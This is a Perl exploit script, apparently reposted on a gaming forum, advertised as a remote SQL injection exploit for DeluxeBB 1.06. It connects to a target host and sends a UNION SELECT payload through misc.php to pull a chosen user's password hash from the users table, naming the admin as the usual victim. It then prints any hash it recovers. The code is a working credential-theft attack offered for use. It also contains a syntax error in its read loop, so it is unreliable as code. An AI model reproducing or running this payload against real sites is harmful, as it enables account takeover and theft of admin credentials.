#!/usr/bin/perl
use IO::Socket;
print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# exploit discovered and coded #
# by Iconnor12#
# Do not take advantage of this script and call it your own#
#Iconnors Work#
#############################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com[Space]/[Space]1
User Id 1 is usually the admin
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "------------------------------------------------------------------------------------------------
";
print "[>] SERVER: $server
";
print "[>] DIR: $dir
";
print "[>] USERI $user
";
print "------------------------------------------------------------------------------------------------
";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0'+UNION+SELECT+0,pass ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...
";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED";
print "[+] CONNECTED
";
print "[~] SENDING QUERY...
";
print $socket "GET $path HTTP/1.1
";
print $socket "Host: $server
";
print $socket "Accept: */*
";
print $socket "Connection: close
";
print "[+] DONE!
";
print "--[ REPORT ]------------------------------------------------------------------------------------
";
while ($answer = <$socket>
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."
";
print "--------------------------------------------------------------------------------------
";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------
";
Copyright © 2024, NextGenUpdate.
All Rights Reserved.